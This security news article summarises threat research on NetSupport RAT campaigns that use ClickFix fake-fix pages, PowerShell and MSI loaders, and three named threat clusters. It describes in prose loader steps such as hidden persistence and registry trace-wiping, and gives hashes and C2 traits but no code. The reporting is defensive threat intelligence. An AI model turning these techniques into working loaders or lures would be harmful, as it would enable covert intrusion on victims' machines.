NetSupport RAT Campaign Abuses ClickFix to Infect Hosts; 3 Threat Clusters Use RMM for Covert Access

eSentire’s Threat Response Unit (TRU) has exposed a major wave of malicious campaigns abusing the NetSupport Manager remote administration tool (RAT), attributed to three distinct threat groups. The report highlights how attackers have shifted their delivery methods in 2025, moving from traditional fake browser updates to the ClickFix social engineering technique, enabling remote access and data theft through weaponized PowerShell loaders.

The ClickFix method lures victims into executing malicious commands through the Windows Run prompt, using realistic “update” or “fix” pages. Once the user complies, “this action triggers the extraction and execution of NetSupport on the target system,” effectively granting attackers full remote access to the victim’s machine.

TRU identified multiple PowerShell-based loaders responsible for deploying NetSupport in these campaigns. These loaders are designed to bypass antivirus detection and establish persistence silently.

In one example, TRU described how a specific PowerShell-based loader drops and executes NetSupport, referencing a variant with SHA256 hash a823031ba57d0e5f7ef15d63fe93a05ed00eadfd19afc7d2fed60f20e651a8bb. The loader performs a series of hidden actions:

1. Decodes a base64-encoded JSON blob containing payloads.
2. Creates a hidden directory for the dropper files.
3. Writes decoded payloads to disk.
4. Establishes persistence via a Startup folder shortcut.
5. Verifies all NetSupport configuration files are in place.
6. Executes the NetSupport client (“client32.exe”).

TRU also documented a more advanced variant that deletes RunMRU registry entries to erase traces of user-executed commands, demonstrating an evolution toward stealthier operations.

While PowerShell remains the dominant loader, eSentire also observed attackers leveraging MSI installers as Living-Off-the-Land Binaries (LOLbins) to execute NetSupport payloads.

One analyzed sample, d5b13eb9e8afb79b4d7830caf3ac746637e5bda1752962e5bd0aed3352cc4a42, used the Windows msiexec command to retrieve malicious installer packages from compromised domains. These installers executed base64-encoded PowerShell payloads, which then deobfuscated byte arrays to reconstruct additional malicious scripts in memory.

TRU noted that the final decoded stage sent HTTP requests with a GoLang-based user agent (“Go-http-client/1.2”), pulling and executing remote commands via Invoke-Expression (IEx).

Through traffic analysis, eSentire confirmed that all campaigns used NetSupport Connectivity Servers (Gateways) running version 1.92. The observed C2 traffic began with the POLL command, a characteristic handshake for the RAT’s control protocol.

The TRU team further clustered the activity into three separate threat groups, each distinguished by licensing data, infrastructure, and tactics.

Cluster 1: “EVALUSION” Campaign

The EVALUSION cluster is the most active and widespread. eSentire observed:

• Common license parameters such as “EVALUSION licensee, serial NSM165348, 5000 maxslaves” and “20sd typo in NSM.LIC”.
• Infrastructure distributed across Lithuania, Russia, Moldova, the UAE, the UK, and the United States.
• Use of both PowerShell and Curl-based loaders.

TRU assessed that EVALUSION deliberately spreads infrastructure across multiple countries and uses many variations of loaders, indicating a well-resourced and adaptive criminal operation.

Cluster 2: “FSHGDREE32/SGI” Campaign

A second cluster, FSHGDREE32/SGI, shares technical overlap with EVALUSION but uses distinct licensing keys and infrastructure.

• Identical RADIUSSecret values across samples.
• Related NetSupport client licenses issued in 2015 and 2017 with over 100,000 “maxslaves” (infected endpoints).
• Hosting primarily across Eastern Europe, including Russia, Moldova, Bulgaria, and the UK.

TRU highlighted the use of bulletproof hosting providers and shared nameservers (e.g., LUXHOST and MY-NDNS) to obscure attribution and extend uptime.

Cluster 3: “XMLCTL” Campaign

The third and most distinct campaign, XMLCTL, has been linked to UAC-0050, a threat actor previously documented by Proofpoint for targeting Ukrainian organizations using NetSupport.

Unlike the other clusters, XMLCTL uses MSI-based loaders and commercial U.S.-based infrastructure instead of bulletproof hosts. Its configuration differs technically — featuring “SecurityKeyU” instead of RADIUSSecret and non-standard ports (1203).

This suggests a separate actor with different motivations or operational models, potentially blending espionage and cybercrime.

The NetSupport RAT, originally marketed as a legitimate remote administration and classroom management tool, continues to be weaponized by threat actors for covert access, data theft, and persistence.

TRU emphasizes that “this ongoing practice of leveraging legitimate remote administration tools for malicious purposes continues patterns documented in previous security advisories.”

By blending in with normal IT operations, NetSupport infections often go undetected, allowing adversaries to maintain long-term access to compromised environments.

Related Posts:

• Hackers are trying to install NetSupport Remote Access Tool on victim machine through Fake Software Update
• Cisco Talos Warns of Stealthy NetSupport RAT Campaigns
• NetSupport RAT Returns: Weaponized via WordPress & “ClickFix” for Remote Access
• NetSupport RAT Wielded in Escalating Cyber Attacks: Educational Institutions, Government Agencies, and Service Businesses at Risk
• Malicious Cisco AnyConnect Ads Target Users with NetSupport RAT